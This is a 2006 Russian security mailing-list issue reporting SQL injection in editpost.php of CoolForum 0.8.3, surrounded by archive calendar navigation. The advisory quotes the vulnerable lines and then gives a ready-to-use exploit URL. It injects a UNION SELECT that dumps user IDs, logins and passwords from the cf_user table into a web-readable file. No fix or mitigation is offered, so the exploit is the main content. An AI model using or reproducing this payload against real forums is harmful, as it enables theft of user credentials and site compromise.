Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в CoolForum. (comp.paper.supuser) : Рассылка : Subscribe.Ru

IT-безопасность в быту и не только

Рассылка закрыта

При закрытии подписчики были переданы в рассылку "Безопасность. Статьи, новости, комментарии" на которую и рекомендуем вам подписаться.

Вы можете найти рассылки сходной тематики в Каталоге рассылок.

← Июнь 2006 →
	1	2 02.06.2006 07:05:16 13:05:11 17:05:16	3	4
5	6	7	8 08.06.2006 07:05:38 13:05:05	9 09.06.2006 07:05:21 13:05:14	10	11
12 12.06.2006 07:05:17 13:05:08 14:05:06 17:05:04	13 13.06.2006 07:05:43 12:05:12 16:05:07	14 14.06.2006 07:05:28 12:05:09 16:05:10	15 15.06.2006 07:05:59 12:05:12 16:05:12	16 16.06.2006 07:05:15 12:05:11 16:05:09	17 17.06.2006 07:05:31 12:05:06 16:05:06	18 18.06.2006 07:05:13 10:05:28
19 19.06.2006 10:50:51 10:58:02 11:41:37 11:54:53 13:13:16	20 20.06.2006 07:05:46 10:05:25 13:05:10 16:30:44 18:05:09	21 21.06.2006 07:05:24 10:14:50 13:28:47 16:21:39 18:05:09	22 22.06.2006 07:05:43 11:54:16 13:17:13 15:46:04 17:18:39	23 23.06.2006 07:05:29 10:05:21 12:05:14 15:05:06 17:05:10	24 24.06.2006 07:05:23 10:05:17 12:05:12 17:05:06	25 25.06.2006 07:05:39 10:05:16 12:05:08 15:05:10 17:05:07
26 26.06.2006 07:05:26 10:05:20 12:07:14 15:05:25 17:08:47	27 27.06.2006 07:05:33 10:05:22 12:05:11 16:34:56 17:18:42	28 28.06.2006 07:05:32 10:05:43 12:13:49 15:05:13	29 29.06.2006 07:05:34 10:05:48 12:05:15 15:05:13 17:05:24	30 30.06.2006 07:05:44 10:05:24 12:05:09 15:05:10 17:05:11

Автор

Forester

Статистика

1.394 подписчиков
-1 за неделю

← Все выпуски →

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в CoolForum.

Компьютер для продвинутых пользователей

В этом выпуске:

CoolForum

ПО: CoolForum
Версия: 0.8.3

Уязвимость:
В файле editpost.php найдены множественные уязвимости.
Строка 38:
if(isset($_REQUEST['post'])) $post = intval($_REQUEST['post']);
else $post = 0;
Строка 77:
$canedit = getrightedit($_REQUEST['post'],$_REQUEST['forumid']);
Использование:
http://[...]/editpost.php?forumid=1&post=3 UNION SELECT userid,login,password FROM cf_user INTO OUTFILE '/www/web/resultat.txt'%23&parent=1&p=1

Не забудьте проголосовать за выпуск!

Рассылка создана и ведется при поддержке Информационной сети Пермского края.

Меня можно найти:	ICQ - 273214003
	e-mail - isdmi1::mail.ru

В избранное

← Июнь 2006 →
			1	2 02.06.2006 07:05:16 13:05:11 17:05:16	3	4
5	6	7	8 08.06.2006 07:05:38 13:05:05	9 09.06.2006 07:05:21 13:05:14	10	11
12 12.06.2006 07:05:17 13:05:08 14:05:06 17:05:04	13 13.06.2006 07:05:43 12:05:12 16:05:07	14 14.06.2006 07:05:28 12:05:09 16:05:10	15 15.06.2006 07:05:59 12:05:12 16:05:12	16 16.06.2006 07:05:15 12:05:11 16:05:09	17 17.06.2006 07:05:31 12:05:06 16:05:06	18 18.06.2006 07:05:13 10:05:28
19 19.06.2006 10:50:51 10:58:02 11:41:37 11:54:53 13:13:16	20 20.06.2006 07:05:46 10:05:25 13:05:10 16:30:44 18:05:09	21 21.06.2006 07:05:24 10:14:50 13:28:47 16:21:39 18:05:09	22 22.06.2006 07:05:43 11:54:16 13:17:13 15:46:04 17:18:39	23 23.06.2006 07:05:29 10:05:21 12:05:14 15:05:06 17:05:10	24 24.06.2006 07:05:23 10:05:17 12:05:12 17:05:06	25 25.06.2006 07:05:39 10:05:16 12:05:08 15:05:10 17:05:07
26 26.06.2006 07:05:26 10:05:20 12:07:14 15:05:25 17:08:47	27 27.06.2006 07:05:33 10:05:22 12:05:11 16:34:56 17:18:42	28 28.06.2006 07:05:32 10:05:43 12:13:49 15:05:13	29 29.06.2006 07:05:34 10:05:48 12:05:15 15:05:13 17:05:24	30 30.06.2006 07:05:44 10:05:24 12:05:09 15:05:10 17:05:11